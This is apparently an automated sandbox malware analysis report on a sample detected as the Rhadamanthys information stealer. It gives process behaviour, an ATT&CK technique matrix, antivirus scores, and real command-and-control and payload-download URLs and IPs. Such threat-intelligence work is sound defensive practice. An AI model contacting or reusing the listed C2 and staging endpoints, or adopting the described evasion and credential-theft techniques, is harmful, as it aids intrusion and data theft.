Source: Flux.com, 00000014.00000000.2370207321.0000000000DD3000.00000002.00000001.01000000.0000000B.sdmp, Fo.9.dr, Flux.com.11.dr

Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\main.exe

Code function: 0_2_00007FF7FE90BA10 GetSystemTimeAsFileTime,

0_2_00007FF7FE90BA10

Source: C:\Users\user\AppData\Local\Temp\downloaded_exe.exe

Code function: 9_2_00406831 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

9_2_00406831

Source: C:\Windows\SysWOW64\svchost.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: powershell.exe, 00000007.00000002.2244700995.000002631B6E3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: :Wed, 04 Oct 2023 13:45:03 GMTr\MsMpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: powershell.exe, 00000007.00000002.2221533040.0000026301655000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2221658147.0000026301775000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.29.dr	Binary or memory string: MsMpEng.exe

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Stealing of Sensitive Information

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000017.00000003.2575544799.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2663941815.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected RHADAMANTHYS Stealer

Source: Yara match	File source: 00000017.00000003.2575544799.0000000002C40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2663941815.0000000002C50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	21 Windows Management Instrumentation	1 DLL Side-Loading	112 Process Injection	111 Masquerading	31 Input Capture	1 System Time Discovery	Remote Services	31 Input Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	241 Security Software Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Native API	Logon Script (Windows)	Logon Script (Windows)	112 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	2 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	31 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	3 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	3 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	116 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
main.exe	7%	Virustotal		Browse
main.exe	3%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\542181\Flux.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\Del	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\downloaded_exe.exe	25%	ReversingLabs	Win32.Trojan.Generic

Source	Detection	Scanner	Label
https://ebitm.co.uk/	0%	Avira URL Cloud	safe
https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5x	100%	Avira URL Cloud	malware
https://ebitm.co.uk/salah/wp-includes/assets/ping.phpdownloaded_exe.exeopenbasic_string:	0%	Avira URL Cloud	safe
https://ebitm.co.uk/salah/wp-includes/assets/ping.php	0%	Avira URL Cloud	safe
https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5	100%	Avira URL Cloud	malware
https://ebitm.co.uk/salah/wp-includes/assets/ping.php=c	0%	Avira URL Cloud	safe
https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatio	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ebitm.co.uk	185.199.220.71	true	false		unknown
dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuD	unknown	unknown	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ebitm.co.uk/salah/wp-includes/assets/ping.php	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://gcc.gnu.org/bugs/):	main.exe	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2222225153.0000026304E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000007.00000002.2222225153.0000026304981000.00000004.00000800.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2222225153.0000026303799000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ebitm.co.uk/	main.exe, 00000000.00000002.2313616960.0000023EC553F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2222225153.0000026303799000.00000004.00000800.00020000.00000000.sdmp	false		high
https://go.micro	powershell.exe, 00000007.00000002.2222225153.00000263044FE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2222225153.00000263048F6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cloudflare-dns.com/dns-query	svchost.exe, 00000017.00000003.2596668769.0000000002B9F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.29.dr	false		high
http://www.autoitscript.com/autoit3/X	Flux.com, 00000014.00000000.2370366583.0000000000DE5000.00000002.00000001.01000000.0000000B.sdmp, Fo.9.dr, Flux.com.11.dr	false		high
https://cloudflare-dns.com/dns-queryPOSTContent-TypeContent-LengthHostapplication/dns-message%dMachi	svchost.exe, 00000017.00000003.2596668769.0000000002B9F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	downloaded_exe.exe, 00000009.00000000.2311050640.0000000000409000.00000002.00000001.01000000.00000008.sdmp, downloaded_exe.exe, 00000009.00000002.2330199744.0000000000409000.00000002.00000001.01000000.00000008.sdmp, downloaded_exe.exe.0.dr	false		high
https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5	svchost.exe, 00000017.00000002.2663181132.000000000043C000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 00000017.00000002.2663745783.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, fontdrvhost.exe, 0000001B.00000002.2744428427.000001E32EC20000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.autoitscript.com/autoit3/	Billion.9.dr, Flux.com.11.dr	false		high
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2222225153.0000026303799000.00000004.00000800.00020000.00000000.sdmp	false		high
https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5x	svchost.exe, 00000017.00000002.2663181132.000000000043C000.00000004.00000010.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ebitm.co.uk/salah/wp-includes/assets/ping.phpdownloaded_exe.exeopenbasic_string:	main.exe	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2222225153.0000026304E5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2241017052.00000263135F1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.orgX	powershell.exe, 00000007.00000002.2222225153.0000026304981000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ebitm.co.uk/salah/wp-includes/assets/ping.php=c	main.exe, 00000000.00000002.2313616960.0000023EC5519000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore68	powershell.exe, 00000007.00000002.2222225153.0000026303571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://5.35.36.120:7957/457126a29df4c81310/0h5bjd37.h9so5kernelbasentdllkernel32GetProcessMitigatio	svchost.exe, 00000017.00000002.2663745783.0000000002B0C000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.2744428427.000001E32EC20000.00000040.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000007.00000002.2222225153.0000026303571000.00000004.00000800.00020000.00000000.sdmp	false		high
https://oneget.org	powershell.exe, 00000007.00000002.2222225153.0000026304981000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.199.220.71	ebitm.co.uk	United Kingdom		12488	KRYSTALGR	false
5.35.36.120	unknown	Russian Federation		31514	INF-NET-ASRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1578117
Start date and time:	2024-12-19 09:28:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
